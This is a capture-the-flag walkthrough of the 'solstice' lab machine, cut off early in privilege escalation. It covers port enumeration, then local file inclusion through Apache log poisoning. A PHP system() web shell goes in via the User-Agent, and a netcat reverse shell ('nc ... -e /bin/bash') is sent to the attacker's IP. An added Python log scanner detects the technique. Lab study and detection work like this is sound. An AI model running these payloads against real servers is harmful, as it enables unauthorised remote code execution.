Pwned Date - 7th July 2022

Enumeration

PORT      STATE  SERVICE    VERSION
21/tcp    open   ftp        pyftpdlib 1.5.6
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.81.72:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp    open   ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
|   256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_  256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp    open   smtp       Exim smtpd
| smtp-commands: solstice Hello nmap.scanme.org [192.168.49.125], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open   http       Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site does not have a title (text/html).
2121/tcp  open   ftp        pyftpdlib 1.5.6
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.81.72:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------   2 www-data www-data     4096 Jun 18  2020 pub
3128/tcp  open   http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
8593/tcp  open   http       PHP cli server 5.5 or later (PHP 7.3.14-1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Site does not have a title (text/html; charset=UTF-8).
54787/tcp open   http       PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
62524/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two FTP ports open, 21 and 2121. Port 2121 has a /pub folder, which is owned and writable by www-data.

ftp> ls -la
229 Entering extended passive mode (|||52553|).
125 Data connection already open. Transfer starting.
drws------   2 www-data www-data     4096 Jun 18  2020 pub
226 Transfer complete.

There is nothing on port 80; port 8593, on the other hand, serves a site.

The Book List tab is vulnerable to Local File Inclusion (LFI).

Exploitation

LFI via the access log (log poisoning)

┌──(kali㉿VirtualBox)-[~]
└─$ curl 192.168.81.72 -A "<?php system(\$_GET['cmd']);?>"
 <head>
Currently configuring the database, try later.
 <style type ="text/css" >
   .footer{ 
       position: fixed;     
       text-align: center;    
       bottom: 0px; 
       width: 100%;
   }  
</style>
</head>
<body>
    <div class="footer">Proudly powered by phpIPAM 1.4</div>
</body>

Now trigger a reverse shell through the PHP payload stored in access.log, passing the command via the cmd parameter:

curl -s "http://192.168.81.72:8593/index.php?book=../../../../../var/log/apache2/access.log&cmd=nc%20192.168.49.81%204444%20-e%20%2Fbin%2Fbash%20"

Meanwhile, our netcat listener catches the connection:

┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.72] 48092

whoami
www-data

pwd
/var/www

cat local.txt
8a6a738a69637b9332624e910a8e4b7c
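
As an added defensive example (not part of the original writeup): a small Python scanner over Apache combined-format log lines that flags both halves of the technique above, a PHP tag landing in a logged header and a later request that traverses to the log file carrying a `cmd` parameter. The log lines are constructed for the example, not taken from the box.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)          # stage 1: code planted in a logged header
TRAVERSAL = re.compile(r'\.\.[/\\]')                         # stage 2: "../" after URL-decoding
LOG_PATH = re.compile(r'/var/log/|\b(access|error)\.log\b')  # the poisoned file being pulled in

def analyse_line(line):
    """Return a list of (tag, detail) findings for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsed", line[:80])]
    findings = []
    for name, value in (("user_agent", m["agent"]), ("referer", m["referer"])):
        if PHP_TAG.search(value):
            findings.append(("php_in_" + name, value))
    parts = m["request"].split(" ")
    raw = parts[1] if len(parts) > 1 else ""
    target = unquote(raw)  # decode once so %2e%2e%2f-style encodings are caught too
    if TRAVERSAL.search(target):
        findings.append(("traversal", target))
        if LOG_PATH.search(target):
            findings.append(("log_inclusion", target))
    params = parse_qs(urlsplit(raw).query)
    if "cmd" in params:
        findings.append(("cmd_param", params["cmd"][0]))
    return findings

def scan(lines):
    """Scan a whole log; return [(line_no, tag, detail), ...] for suspicious lines only."""
    return [(n, tag, detail)
            for n, line in enumerate(lines, 1)
            for tag, detail in analyse_line(line)]

# Constructed sample log (not captured from the box): poison, trigger, then a benign request.
SAMPLE_LOG = """\
192.168.49.81 - - [07/Jul/2022:10:55:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']);?>"
192.168.49.81 - - [07/Jul/2022:10:56:12 +0000] "GET /index.php?book=../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 2048 "-" "curl/7.74.0"
10.0.0.5 - - [07/Jul/2022:10:57:30 +0000] "GET /index.php?book=list HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for line_no, tag, detail in scan(SAMPLE_LOG.splitlines()):
        print(f"line {line_no}: {tag}: {detail}")
```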

Privilege Escalation

There is something running under PHP:

www-data@solstice:~$ ps aux | grep php
ps aux | grep php
www-data   509  0.0  0.0   2388   752 ?        Ss   10:50   0:00 /bin/sh -c /usr/bin/php -S 0.0.0.0:54787 -t /var/tmp/webserver_2/
root       510  0.0  0.0   2388   760 ?        Ss   10:50   0:00 /bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/
www-data   512  0.0  0.0   2388   752 ?        Ss   10:50   0:00 /bin/sh -c /usr/bin/php -S 0.0.0.0:8593 -t /var/tmp/webserver/
root       522  0.0  2.0 196744 21152 ?        S    10:50   0:00 /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/
www-data   523  0.0  2.1 196936 21812 ?        S    10:50   0:00 /usr/bin/php -S 0.0.0.0:8593 -t /var/tmp/webserver/
www-data   524  0.0  2.0 196744 21188 ?        S    10:50   0:00 /usr/bin/php -S 0.0.0.0:54787 -t /var/tmp/webserver_2/
www-data  1785  0.0  0.0   6076   884 pts/0    S+   11:09   0:00 grep php

User root is running a PHP server on 127.0.0.1:57 serving /var/tmp/sv, huh? What is it?